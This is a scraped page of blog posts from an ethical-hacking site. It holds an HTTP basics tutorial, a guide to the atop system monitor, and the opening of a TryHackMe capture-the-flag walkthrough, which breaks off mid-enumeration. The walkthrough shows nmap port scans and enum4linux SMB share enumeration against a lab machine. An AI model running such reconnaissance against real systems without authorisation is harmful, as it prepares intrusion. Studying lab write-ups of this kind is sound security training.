What is HTTP(S)?

What is HTTP? (HyperText Transfer Protocol)

HTTP is what's used whenever you view a website, developed by Tim Berners-Lee and his team between 1989-1991. HTTP is the set of rules used for communicating with web servers for the transmitting of webpage data, whether that is HTML, Images, Videos, etc. Learn about how you request content from a web server using the HTTP protocol

What is HTTPS? (HyperText Transfer Protocol Secure)

HTTPS is the secure version of HTTP. HTTPS data is encrypted so it not only stops people from seeing the data you are receiving and sending, but it also gives you assurances that you're talking to the correct web server and not something impersonating it.



When we access a website, your browser will need to make requests to a web server for assets such as HTML, Images, and download the responses. Before that, you need to tell the browser specifically how and where to access these resources, this is where URLs will help.

What is a URL? (Uniform Resource Locator)

If you’ve used the internet, you’ve used a URL before. A URL is predominantly an instruction on how to access a resource on the internet. The below image shows what a URL looks like with all of its features (it does not use all features in every request).

Scheme (http) - This instructs on what protocol to use for accessing the resource such as HTTP, HTTPS, FTP (File Transfer Protocol).

User (userNpass) - Some services require authentication to log in, you can put a username and password into the URL to log in.

Host (hackingtruth.in) - The domain name or IP address of the server you wish to access.

Port (80) - The Port that you are going to connect to, usually 80 for HTTP and 443 for HTTPS, but this can be hosted on any port between 1 - 65535.

Path (view-article) - The file name or location of the resource you are trying to access.

Query String (?id=10) - Extra bits of information that can be sent to the requested path. For example, /blog?id=1 would tell the blog path that you wish to receive the blog article with the id of 1.

Fragment (#task3) - This is a reference to a location on the actual page requested. This is commonly used for pages with long content and can have a certain part of the page directly linked to it, so it is viewable to the user as soon as they access the page.

Making a Request

It's possible to make a request to a web server with just one line "GET / HTTP/1.1"

But for a much richer web experience, you’ll need to send other data as well. This other data is sent in what is called headers, where headers contain extra information to give to the web server you’re communicating with, but we’ll go more into this in the Header task.

Example

GET / HTTP/1.1
Host: hackingtruth.in
User-Agent: Mozilla/5.0 Firefox/87.0
Referer: https://hackingtruth.in/

To breakdown each line of this request:

• Line 1: This request is sending the GET method ( more on this in the HTTP Methods task ), request the home page with / and telling the web server we are using HTTP protocol version 1.1.
• Line 2: We tell the web server we want the website hackingtruth.in
• Line 3: We tell the web server we are using the Firefox version 87 Browser
• Line 4: We are telling the web server that the web page that referred us to this one is https://hackingtruth.in
• Line 5: HTTP requests always end with a blank line to inform the web server that the request has finished.

Example Response:

HTTP/1.1 200 OK
Server: Apache/2.4.46
Date: Fri, 09 Apr 2021 13:34:03 GMT
Content-Type: text/html
Content-Length: 98

<html>
<head>
    <title>HackingTruth</title>
</head>
<body>
    Welcome To HackingTruth.in
</body>
</html>

To breakdown each line of the response:

 

Line 1: HTTP 1.1 is the version of the HTTP protocol the server is using and then followed by the HTTP Status Code in this case "200 Ok" which tells us the request has completed successfully.

Line 2: This tells us the web server software and version number.

Line 3: The current date, time and timezone of the web server.

Line 4: The Content-Type header tells the client what sort of information is going to be sent, such as HTML, images, videos, pdf, XML.

Line 5: Content-Length tells the client how long the response is, this way we can confirm no data is missing.

Line 6: HTTP response contains a blank line to confirm the end of the HTTP response.

Lines 7-14: The information that has been requested, in this instance the homepage.

HTTP Methods

HTTP methods are a way for the client to show their intended action when making an HTTP request. There are a lot of HTTP methods but we'll cover the most common ones, although mostly you'll deal with the GET and POST method.

GET Request

This is used for getting information from a web server.

 

POST Request

This is used for submitting data to the web server and potentially creating new records

PUT Request

This is used for submitting data to a web server to update information

DELETE Request

This is used for deleting information/records from a web server.

HTTP Status Codes

In the previous task, you learnt that when a HTTP server responds, the first line always contains a status code informing the client of the outcome of their request and also potentially how to handle it. These status codes can be broken down into 5 different ranges:

100-199 -- Information Response	These are sent to tell the client the first part of their request has been accepted and they should continue sending the rest of their request. These codes are no longer very common.

200-299 -- Success	This range of status codes is used to tell the client their request was successful.

300-399 -- Redirection	These are used to redirect the client's request to another resource. This can be either to a different webpage or a different website altogether.

400-499 -- Client Errors	Used to inform the client that there was an error with their request.

500-599 -- Server Errors	This is reserved for errors happening on the server-side and usually indicate quite a major problem with the server handling the request.

Common HTTP Status Codes:

There are a lot of different HTTP status codes and that's not including the fact that applications can even define their own, we'll go over the most common HTTP responses you are likely to come across:

200 -- OK	The request was completed successfully.

201 -- Created	A resource has been created (for example a new user or new blog post).

301 -- Permanent Redirect	This redirects the client's browser to a new webpage or tells search engines that the page has moved somewhere else and to look there instead.

302 -- Temporary Redirect	Similar to the above permanent redirect, but as the name suggests, this is only a temporary change and it may change again in the near future.

400 -- Bad Request	This tells the browser that something was either wrong or missing in their request. This could sometimes be used if the web server resource that is being requested expected a certain parameter that the client didn't send.

401 -- Not Authorised	You are not currently allowed to view this resource until you have authorised with the web application, most commonly with a username and password.

403 -- Forbidden	You do not have permission to view this resource whether you are logged in or not.

405 -- Method Not Allowed	The resource does not allow this method request, for example, you send a GET request to the resource /create-account when it was expecting a POST request instead.

404 -- Page Not Found	The page/resource you requested does not exist.

500 -- Internal Service Error	The server has encountered some kind of error with your request that it doesn't know how to handle properly.

503 -- Service Unavailable	

This server cannot handle your request as it's either overloaded or down for maintenance.

Headers

Headers are additional bits of data you can send to the web server when making requests.

Although no headers are strictly required when making a HTTP request, you’ll find it difficult to view a website properly.

 

Common Request Headers

These are headers that are sent from the client (usually your browser) to the server.

Host: Some web servers host multiple websites so by providing the host headers you can tell it which one you require, otherwise you'll just receive the default website for the server.

User-Agent: This is your browser software and version number, telling the web server your browser software helps it format the website properly for your browser and also some elements of HMTL, JavaScript and CSS are only available in certain browsers.

Content-Length: When sending data to a web server such as in a form, the content length tells the web server how much data to expect in the web request. This way the server can ensure it isn't missing any data.

Accept-Encoding: Tells the web server what types of compression methods the browser supports so the data can be made smaller for transmitting over the internet.

Cookie: Data sent to the server to help remember your information (see cookies task for more information).

Common Response Headers

These are the headers that are returned to the client from the server after a request.

Set-Cookie: Information to store which gets sent back to the web server on each request (see cookies task for more information).

Cache-Control: How long to store the content of the response in the browser's cache before it requests it again.

Content-Type: This tells the client what type of data is being returned, i.e., HTML, CSS, JavaScript, Images, PDF, Video, etc. Using the content-type header the browser then knows how to process the data.

Content-Encoding: What method has been used to compress the data to make it smaller when sending it over the internet.

Cookies

You've probably heard of cookies before, they're just a small piece of data that is stored on your computer. Cookies are saved when you receive a "Set-Cookie" header from a web server. Then every further request you make, you'll send the cookie data back to the web server. Because HTTP is stateless (doesn't keep track of your previous requests), cookies can be used to remind the web server who you are, some personal settings for the website or whether you've been to the website before. Let's take a look at this as an example HTTP request:

Get / HTTP/1.1           (The client requests the
Host: Cookies.ht           webpage from 
User-agent: xyxyx          https:/cookies.ht)

HTTP/1.1 200 Ok                         (The server responds back with
Server: Apache/2.4.46                    a simple webpage with a form          
Date: Tue 18 Feb 2021 07:07:19 GMT        asking for the users name)
Content-Type: text/html; charset=UTF-8  

POST / HTTP/1.1                                (The client sends back the
Host: cookies.ht                                form with the name 
User-Agent: xyxyx                                set to atul)    
Content-Type: application/x-www-form-urlencoded
content-Length: 12  

name = atul

HTTP/1.1 200 OK                          (The server responds with a set
server: Apache/2.4.46                      cookie header telling the 
Date: Tue 18 Feb 2021 07:07:19 GMT          client to save the data
Set-Cookie: name=atul                        name=atul)
Content-Type: text/html; chatset=UTF-8


HTML DATA.........

GET / HTTP/1.1                         (On the next and every further
Host: cookies.ht                        requests the client send the
User-Agent: xyxyx                       cookie data back to the server)
Cookie: name=atul

HTTP/1.1 200 OK                        (The server then see the cookie data and
Server: Apache/2.4.46                        instead of displaying the form
Date: Tue 18 Feb 2021 07:07:19 GMT               it displays a welcome back message instead)
Content-Type: text/html; chatset=UTF-8 
Welcome back atul

Cookies can be used for many purposes but are most commonly used for website authentication. The cookie value won't usually be a clear-text string where you can see the password, but a token (unique secret code that isn't easily humanly guessable).

Viewing Your Cookies

You can easily view what cookies your browser is sending to a website by using the developer tools, in your browser. If you're not sure how to get to the developer tools in your browser, click on the "View Site" button at the top of this task for a how-to guide.

Once you have developer tools open, click on the "Network" tab. This tab will show you a list of all the 

Disclaimer

This was written for educational purpose and pentest only.
The author will not be responsible for any damage ..!
The author of this tool is not responsible for any misuse of the information.
You will not misuse the information to gain unauthorized access.
This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



- Hacking Truth by Kumar Atul Jaiswal



I hope you liked this post, then you should not forget to share this post at all.
Thank you so much :-)

 

The atop command displays you a more anatomized view of your server's performance. The program atop is an interactive monitor to view the load on a Linux system. It shows the occupation of the most critical hardware resources (from a performance point of view) on system level, i.e. cpu, memory, disk and network. It also shows which processes are responsible for the indicated load with respect to cpu and memory load on process level. Disk load is shown per process if "storage accounting" is active in the kernel. Network load is shown per process if the kernel module `netatop' has been installed. atop a CLI monitoring tool for linux

Installation

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
└─$ sudo apt-get install atop        
[sudo] password for hackerboy: 
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following packages were automatically installed and are no longer required:
  libbasicusageenvironment1 libdap25 libgarcon-gtk3-1-0 libgroupsock8 libgtop-2.0-11 libgtop2-common libjsoncpp1 liblivemedia77 libre2-8
  librpm8 librpmbuild8 librpmio8 librpmsign8 libsane libusageenvironment3 libxdo3 libxfce4ui-utils libxpresent1 light-locker
  linux-headers-5.9.0-kali2-amd64 linux-headers-5.9.0-kali2-common linux-image-5.9.0-kali2-amd64 python3-atomicwrites python3-pathtools
  tango-icon-theme x11-session-utils xdotool xfce4-appfinder xfce4-helpers xfce4-panel xfce4-pulseaudio-plugin xfce4-session xfce4-settings
  xfdesktop4 xfdesktop4-data xfwm4 xiccd xinit xorg
Use 'sudo apt autoremove' to remove them.
The following NEW packages will be installed:
  atop
0 upgraded, 1 newly installed, 0 to remove and 137 not upgraded.
Need to get 201 kB of archives.
After this operation, 511 kB of additional disk space will be used.
Get:1 http://ftp.harukasan.org/kali kali-rolling/main amd64 atop amd64 2.6.0-2 [201 kB]
Fetched 201 kB in 18s (11.1 kB/s)
Selecting previously unselected package atop.
(Reading database ... 407475 files and directories currently installed.)
Preparing to unpack .../atop_2.6.0-2_amd64.deb ...
Unpacking atop (2.6.0-2) ...
Setting up atop (2.6.0-2) ...
update-rc.d: We have no instructions for the atopacct init script.
update-rc.d: It looks like a non-network service, we enable it.
Created symlink /etc/systemd/system/timers.target.wants/atop-rotate.timer → /lib/systemd/system/atop-rotate.timer.
Created symlink /etc/systemd/system/multi-user.target.wants/atop.service → /lib/systemd/system/atop.service.
atop-rotate.service is a disabled or a static unit, not starting it.
atopacct.service is a disabled or a static unit, not starting it.
Processing triggers for kali-menu (2021.2.0) ...
Processing triggers for man-db (2.9.4-2) ...
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/pygeoip/GeoOccupy-new]
└─$ 

Every interval (default: 10 seconds) information is shown about the resource occupation on system level (cpu, memory, disks and  network  layers), followed by a list of processes which have been active during the last interval (note that all pro‐ cesses that were unchanged during the last interval are not shown, unless the key 'a' has been pressed or unless sorting on memory  occupation is done). If the list of active processes does not entirely fit on the screen, only the top of the list is shown (sorted in order of activity). The intervals are repeated till the number of samples (specified as command argument) is reached, or till the  key  'q' is pressed in interactive mode.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
└─$ atop
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
└─$ 

When atop is started, it checks whether the standard output channel is connected to a screen, or to a file/pipe. In the first case it produces screen control codes (via the ncurses library) and behaves interactively; in the second case it pro‐ duces flat ASCII-output.

ATOP - KumarAtulJaiswal                                       2021/05/13  21:03:18                                       ----------------                                        10s elapsed
PRC | sys    1.07s | user   4.10s |               | #proc    177 | #trun      2 | #tslpi   565 |               | #tslpu     0 | #zombie    0 | clones     9 |               | no  procacct |
CPU | sys       9% | user     37% |  irq       0% | idle    354% | wait      0% | steal     0% |  guest     0% |              | ipc notavail | cycl unknown |  curf  500MHz | curscal  25% |
cpu | sys       3% | user      9% |  irq       0% | idle     88% | cpu002 w  0% | steal     0% |  guest     0% |              | ipc notavail | cycl unknown |  curf  500MHz | curscal  25% |
cpu | sys       2% | user     10% |  irq       0% | idle     88% | cpu000 w  0% | steal     0% |  guest     0% |              | ipc notavail | cycl unknown |  curf  500MHz | curscal  25% |
cpu | sys       2% | user      9% |  irq       0% | idle     89% | cpu001 w  0% | steal     0% |  guest     0% |              | ipc notavail | cycl unknown |  curf  500MHz | curscal  25% |
cpu | sys       2% | user      9% |  irq       0% | idle     89% | cpu003 w  0% | steal     0% |  guest     0% |              | ipc notavail | cycl unknown |  curf  500MHz | curscal  25% |
CPL | avg1    0.65 | avg5    0.61 |               | avg15   0.51 |              |              |  csw    27567 | intr   10817 |              |              |  numcpu     4 |              |
MEM | tot     3.6G | free  125.7M |  cache   1.4G | dirty   0.9M | buff  146.2M | slab  175.2M |  slrec 103.7M | shmem 221.1M | shrss  30.5M | vmbal   0.0M |  zfarc   0.0M | hptot   0.0M |
SWP | tot     7.5G | free    7.5G |               |              |              | swcac   0.0M |               |              |              | vmcom   4.3G |               | vmlim   9.4G |
PSI | cpusome   1% | memsome   0% |  memfull   0% | iosome    0% | iofull    0% | cs     1/2/2 |               | ms     0/0/0 | mf     0/0/0 | is     0/0/2 |  if     0/0/1 |              |
DSK |          sda | busy      1% |  read       0 |              | write      3 | KiB/r      0 |  KiB/w     26 | MBr/s    0.0 | MBw/s    0.0 |              |  avq     1.70 | avio 20.0 ms |
NET | transport    | tcpi      18 |  tcpo      23 | udpi       2 | udpo       2 | tcpao      2 |  tcppo      0 | tcprs      0 | tcpie      0 | tcpor      0 |  udpnp      0 | udpie      0 |
NET | network      | ipi       21 |  ipo       26 |              | ipfrw      0 | deliv     21 |               |              |              |              |  icmpi      1 | icmpo      1 |
NET | usb0    ---- | pcki      21 |  pcko      26 | sp    0 Mbps | si    6 Kbps | so    4 Kbps |  coll       0 | mlti       0 | erri       0 | erro       0 |  drpi       0 | drpo       0 |

    PID       SYSCPU       USRCPU       RDELAY         VGROW        RGROW       RUID           EUID            ST       EXC        THR        S       CPUNR        CPU       CMD         1/3
  28734        0.04s        1.64s        0.01s            0K           0K       hackerbo       hackerbo        --         -          7        R           1        17%       qterminal
    846        0.33s        0.76s        0.01s         7052K           0K       root           root            --         -         21        S           0        11%       Xorg
   3478        0.14s        0.32s        0.07s            0K        7708K       hackerbo       hackerbo        --         -         71        S           0         5%       firefox-esr
   3662        0.04s        0.23s        0.03s            0K         192K       hackerbo       hackerbo        --         -         25        S           2         3%       Web Content
   3629        0.05s        0.20s        0.04s            0K         264K       hackerbo       hackerbo        --         -         25        S           2         3%       Web Content
  31181        0.04s        0.20s        0.00s            0K        -620K       hackerbo       hackerbo        --         -         26        S           1         2%       Web Content
   2281        0.05s        0.14s        0.00s            0K           0K       hackerbo       hackerbo        --         -          7        S           0         2%       xfwm4
   3679        0.03s        0.13s        0.00s            0K           0K       hackerbo       hackerbo        --         -         24        S           3         2%       Web Content
   2685        0.03s        0.11s        0.00s            0K           0K       hackerbo       hackerbo        --         -          3        S           1         1%       panel-38-netlo
   2688        0.03s        0.10s        0.00s            0K           0K       hackerbo       hackerbo        --         -          3        S           0         1%       panel-40-cpugr
   3649        0.05s        0.07s        0.01s            0K           0K       hackerbo       hackerbo        --         -         24        S           1         1%       Web Content
  24581        0.11s        0.00s        0.02s            0K           0K       root           root            --         -          1        I           2         1%       kworker/2:0-ev
  32260        0.04s        0.04s        0.00s         4912K        3724K       hackerbo       hackerbo        --         -          1        R           3         1%       atop
   3801        0.00s        0.07s        0.00s            0K         264K       hackerbo       hackerbo        --         -         23        S           1         1%       WebExtensions
   3641        0.02s        0.03s        0.00s            0K           0K       hackerbo       hackerbo        --         -         24        S           0         1%       Web Content
    823        0.00s        0.02s        0.00s            0K           0K       debian-t       debian-t        --         -          1        S           1         0%       tor
   2693        0.01s        0.01s        0.00s            0K           0K       hackerbo       hackerbo        --         -          3        S           0         0%       panel-17-pulse
  32236        0.01s        0.01s        0.00s          132K          28K       root           root            --         -          1        S           1         0%       4nonimizer
   9614        0.01s        0.00s        0.00s            0K           0K       hackerbo       hackerbo        --         -         24        S           0         0%       Web Content
   2511        0.00s        0.01s        0.00s            0K           0K       hackerbo       hackerbo        --         -          3        S           3         0%       xfce4-panel
   2262        0.00s        0.01s        0.00s            0K           0K       hackerbo       hackerbo        --         -          3        S           2         0%       at-spi2-regist
    745        0.01s        0.00s        0.00s            0K           0K       root           root            --         -          4        S           1         0%       rsyslogd
     13        0.01s        0.00s        0.00s            0K           0K       root           root            --         -          1        I           2         0%       rcu_sched
     23        0.01s        0.00s        0.00s            0K           0K       root           root            --         -          1        S           2         0%       ksoftirqd/2
  30029        0.01s        0.00s        0.00s            0K           0K       root           root            --         -          1        I           0         0%       kworker/u8:4-e
  29732        0.00s        0.00s        0.00s            0K           0K       hackerbo       hackerbo        --         -         25        S           1         0%       Web Content

Any Help?

┌──(hackerboy㉿KumarAtulJaiswal)-[~]
└─$ atop -h
Usage: atop [-flags] [interval [samples]]
                or
Usage: atop -w  file  [-S] [-a] [interval [samples]]
       atop -r [file] [-b [YYYYMMDD]hhmm] [-e [YYYYMMDD]hhmm] [-flags]

        generic flags:
          -V  show version information
          -a  show or log all processes (i.s.o. active processes only)
          -R  calculate proportional set size (PSS) per process
          -W  determine WCHAN (string) per thread
          -P  generate parseable output for specified label(s)
          -L  alternate line length (default 80) in case of non-screen output
          -f  show fixed number of lines with system statistics
          -F  suppress sorting of system resources
          -G  suppress exited processes in output
          -l  show limited number of lines for certain resources
          -y  show threads within process
          -Y  sort threads (when combined with 'y')
          -1  show average-per-second i.s.o. total values

          -x  no colors in case of high occupation
          -g  show general process-info (default)
          -m  show memory-related process-info
          -d  show disk-related process-info
          -n  show network-related process-info
          -s  show scheduling-related process-info
          -v  show various process-info (ppid, user/group, date/time)
          -c  show command line per process
          -o  show own defined process-info
          -u  show cumulated process-info per user
          -p  show cumulated process-info per program (i.e. same name)
          -j  show cumulated process-info per container

          -C  sort processes in order of cpu consumption (default)
          -M  sort processes in order of memory consumption
          -D  sort processes in order of disk activity
          -N  sort processes in order of network activity
          -E  sort processes in order of GPU activity
          -A  sort processes in order of most active resource (auto mode)

        specific flags for raw logfiles:
          -w  write raw data to   file (compressed)
          -r  read  raw data from file (compressed)
              symbolic file: y[y...] for yesterday (repeated)
              file name '-': read raw data from stdin
          -S  finish atop automatically before midnight (i.s.o. #samples)
          -b  begin showing data from specified date/time
          -e  finish showing data after specified date/time

        interval: number of seconds   (minimum 0)
        samples:  number of intervals (minimum 1)

If the interval-value is zero, a new sample can be
forced manually by sending signal USR1 (kill -USR1 pid_atop)
or with the keystroke 't' in interactive mode.

Please refer to the man-page of 'atop' for more details.
┌──(hackerboy㉿KumarAtulJaiswal)-[~]
└─$                                              

Advantages of atop

Atop is an ASCII, full-screen performance monitor which can log and report the activity of all server processes. One feature I really like is that atop stays active in the background for long-term server analysis (up to 28 days by default). Other advantages include:

• Shows resource usage of all processes, even those that are closed or completed.
• More Linux resources.
• Advanced Linux Commands Cheat Sheet for Developers.
• Get Started with Red Hat Insights.
• Download Now: Basic Linux Commands Cheat Sheet.
• Linux System Administration Skills Assessment.
• Monitors threads within processes and ignores processes that are unused.
• Accumulates resource usage for all processes and users with the same name.
• Highlights critical resources using colors (red).
• Adds or removes columns as the size of the display window changes.
• Includes disk I/O and network utilization.
• Uses the netatop kernel module to monitor TCP, UDP, and network bandwidth.

Disclaimer

This was written for educational purpose and pentest only.
The author will not be responsible for any damage ..!
The author of this tool is not responsible for any misuse of the information.
You will not misuse the information to gain unauthorized access.
This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



- Hacking Truth by Kumar Atul Jaiswal



I hope you liked this post, then you should not forget to share this post at all.
Thank you so much :-)

 

The platform develops virtual classrooms that not only allow users to deploy training environments with the click of a button, but also reinforce learning by adding a question-answer approach. Its a comfortable experience to learn using pre-designed courses which include virtual machines (VM) hosted in the cloud.

TryHackMe VulnNet Internal As a Penetration Testing


While using a question-answer model does make learning easier, TryHackMe allows users to create their own virtual classrooms to teach particular topics enabling them to become teachers. This not only provides other users with rich and varied content, but also helps creators reinforce their understanding of fundamental concepts.
  

VulnNet Entertainment learns from its mistakes, and now they have something new for you...TryHackMe VulnNet Internal As a Penetration Testing

We start of my driving of tryhackme this room a quick scan on all ports using threader300 and simultaneously running nmap service scan to cover the top ports

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ sudo nmap -A -T4 -Pn  -sV -vv -p- 10.10.155.145
[sudo] password for hackerboy: 
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-10 19:10 IST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Scanning 10.10.155.145 [65535 ports]
Discovered open port 111/tcp on 10.10.155.145
Discovered open port 22/tcp on 10.10.155.145
Discovered open port 139/tcp on 10.10.155.145
Discovered open port 445/tcp on 10.10.155.145
Discovered open port 45811/tcp on 10.10.155.145
Discovered open port 51665/tcp on 10.10.155.145
Discovered open port 57017/tcp on 10.10.155.145
Discovered open port 39557/tcp on 10.10.155.145
Discovered open port 2049/tcp on 10.10.155.145
Discovered open port 6379/tcp on 10.10.155.145
Discovered open port 873/tcp on 10.10.155.145
Completed SYN Stealth Scan at 19:19, 520.86s elapsed (65535 total ports)
Nmap scan report for 10.10.155.145
Host is up, received user-set (0.21s latency).
Scanned at 2021-05-10 19:10:58 IST for 561s
Not shown: 65523 closed ports
Reason: 65523 resets
PORT      STATE    SERVICE     REASON         VERSION
22/tcp    open     ssh         syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 5e:27:8f:48:ae:2f:f8:89:bb:89:13:e3:9a:fd:63:40 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDagA3GVO7hKpJpO1Vr6+z3Y9xjoeihZFWXSrBG2MImbpPH6jk+1KyJwQpGmhMEGhGADM1LbmYf3goHku11Ttb0gbXaCt+mw1Ea+K0H00jA0ce2gBqev+PwZz0ysxCLUbYXCSv5Dd1XSa67ITSg7A6h+aRfkEVN2zrbM5xBQiQv6aBgyaAvEHqQ73nZbPdtwoIGkm7VL9DATomofcEykaXo3tmjF2vRTN614H0PpfZBteRpHoJI4uzjwXeGVOU/VZcl7EMBd/MRHdspvULJXiI476ID/ZoQLT2zQf5Q2vqI3ulMj5CB29ryxq58TVGSz/sFv1ZBPbfOl9OvuBM5BTBV
|   256 f4:fe:0b:e2:5c:88:b5:63:13:85:50:dd:d5:86:ab:bd (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNM0XfxK0hrF7d4C5DCyQGK3ml9U0y3Nhcvm6N9R+qv2iKW21CNEFjYf+ZEEi7lInOU9uP2A0HZG35kEVmuideE=
|   256 82:ea:48:85:f0:2a:23:7e:0e:a9:d9:14:0a:60:2f:ad (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJPRO3XCBfxEo0XhViW8m/V+IlTWehTvWOyMDOWNJj+i
111/tcp   open     rpcbind     syn-ack ttl 63 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      40068/udp6  mountd
|   100005  1,2,3      51665/tcp   mountd
|   100005  1,2,3      51843/tcp6  mountd
|   100005  1,2,3      56229/udp   mountd
|   100021  1,3,4      39572/udp6  nlockmgr
|   100021  1,3,4      39935/tcp6  nlockmgr
|   100021  1,3,4      45811/tcp   nlockmgr
|   100021  1,3,4      48120/udp   nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
139/tcp   open     netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open     netbios-ssn syn-ack ttl 63 Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
873/tcp   open     rsync       syn-ack ttl 63 (protocol version 31)
2049/tcp  open     nfs_acl     syn-ack ttl 63 3 (RPC #100227)
6379/tcp  open     redis       syn-ack ttl 63 Redis key-value store
9090/tcp  filtered zeus-admin  no-response
39557/tcp open     mountd      syn-ack ttl 63 1-3 (RPC #100005)
45811/tcp open     nlockmgr    syn-ack ttl 63 1-4 (RPC #100021)
51665/tcp open     mountd      syn-ack ttl 63 1-3 (RPC #100005)
57017/tcp open     mountd      syn-ack ttl 63 1-3 (RPC #100005)
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=5/10%OT=22%CT=1%CU=40428%PV=Y%DS=2%DC=T%G=Y%TM=60993A1
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Uptime guess: 30.994 days (since Fri Apr  9 19:28:16 2021)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: VULNNET-INTERNAL; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap done: 1 IP address (1 host up) scanned in 562.27 seconds
           Raw packets sent: 69689 (3.070MB) | Rcvd: 70367 (3.159MB)
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ 

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$ sudo nmap -p 445  --script=smb-enum-shares.nse, smb-enum-users.nse  10.10.155.145   130 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-10 19:46 IST
Failed to resolve "smb-enum-users.nse".
Nmap scan report for 10.10.155.145
Host is up (0.21s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\10.10.155.145\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (vulnnet-internal server (Samba, Ubuntu))
|     Users: 1
|     Max Users: 
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.155.145\print$: 
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: 
|     Path: C:\var\lib\samba\printers
|     Anonymous access: 
|     Current user access: 
|   \\10.10.155.145\shares: 
|     Type: STYPE_DISKTREE
|     Comment: VulnNet Business Shares
|     Users: 0
|     Max Users: 
|     Path: C:\opt\shares
|     Anonymous access: READ/WRITE
|_    Current user access: READ/WRITE

Nmap done: 1 IP address (1 host up) scanned in 32.14 seconds
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
└─$                                                       

so, after observing the whole nmap output process we decide that we need to enumerate serveral ports, otherwise we will enumerate with SMB.


SMB Enumeration: 138 & 445

so we will use enum4linux tool in our machine with vulnerable macine IP

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
└─$ enum4linux 10.10.155.145                                                   
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon May 10 19:11:45 2021

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.155.145
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none



 ========================================== 
|    Share Enumeration on 10.10.155.145    |
 ========================================== 

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        shares          Disk      VulnNet Business Shares
        IPC$            IPC       IPC Service (vulnnet-internal server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 10.10.155.145
//10.10.155.145/print$  Mapping: DENIED, Listing: N/A
//10.10.155.145/shares  Mapping: OK, Listing: OK
